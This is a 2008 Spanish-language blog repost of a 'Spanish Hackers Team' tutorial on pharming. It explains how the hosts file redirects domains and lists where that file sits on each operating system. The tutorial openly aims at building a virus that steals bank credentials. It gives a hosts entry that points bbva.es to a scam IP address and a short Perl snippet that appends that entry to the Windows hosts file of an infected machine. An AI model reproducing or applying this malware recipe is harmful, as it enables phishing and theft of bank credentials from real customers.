miércoles, 1 de octubre de 2008

Pharming Basics by JosS 

print "\t\t########################################################\n\n";
print "\t\t#          Pharming.txt - Spanish Hackers Team         #\n\n";
print "\t\t#                    by JosS                           #\n\n";
print "\t\t########################################################\n\n";



##Pharming.

Hola a todos!.

Hoy [21-9-07] me gustaría hablarles del pharming, principalmente de su uso y abuso.
Es una vulnerabilidad que reside en los servidores DNS, aquellos servidores que
transforman URLs a IPs. La vulnerabilidad tiene varios usos y muchos de ellos son
fines no legales, como puede ser el Phising, una de las prioridades de esta vuln.

Más que nada quiero enfocar este manual al uso práctico de virus creados para el robo
de credenciales.

##Hosts.

En todos los sistemas operativos, ya sean de particulares o empresas
poseen un archivo llamado 'hosts' en el se encuentran las URLs y las IPs a las que se
dirigen.
Si nosotros podemos escribir en ese archivo 'hosts' podríamos hacer que al entrar a
google.com fuera a www.zone-h.org. Veamos un ejemplo:

127.0.0.1 localhost

Esto quiere decir que localhost se resuelve como 127.0.0.1, es por ello por lo que cuando
ponemos localhost en nuestro navegador nos dirigimos a nuestra máquina.

##Rutas.

# Windows 95/98/Me: C:\Windows\Hosts
# Windows NT/2000: C:\WINNT\System32\drivers\etc
# Windows XP: C:\WINDOWS\system32\drivers\etc
# Windows 2003: C:\WINDOWS\system32\drivers\etc
# Windows Vista: C:\WINDOWS\system32\drivers\etc
# Unix (en general): /etc/hosts
# Linux (en general): /etc/hosts
# MacOS (en general): /etc/hosts

En esos directorios se encuetra un archivo llamado 'hosts'. El cual podemos modificar a
nuestro gusto.

##Code.

Si queremos crear un virus dedicado al robo de credenciales bancarias el uso de la técnica
Pharming nos dará muchos resultados.
Imaginemos que tenemos un Scam del 'Banco BBVA' en la IP = 85.235.65.99 y qeremos que la
víctima que a sido infectada por el virus al entrar a la web oficial del 'Banco BBVA',
redireccione a nuestro Scam. Para eso haríamos esto:

85.235.65.99 bbva.es

La programación del virus:

my $mensaje = "85.235.65.99 bbva.es";

$dir = ' C:\WINDOWS\system32\drivers\etc\hosts ';

open (HOSTS, ">>$dir");

print HOSTS $mensaje;



print "\t\t########################################################\n\n";
print "\t\t#          Pharming.txt - Spanish Hackers Team          #\n\n";
print "\t\t#                    by JosS                           #\n\n";
print "\t\t########################################################\n\n";

# spanish-hackers.com

Source:
Spanish Hackers Team
Publicado por en
Etiquetas:

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)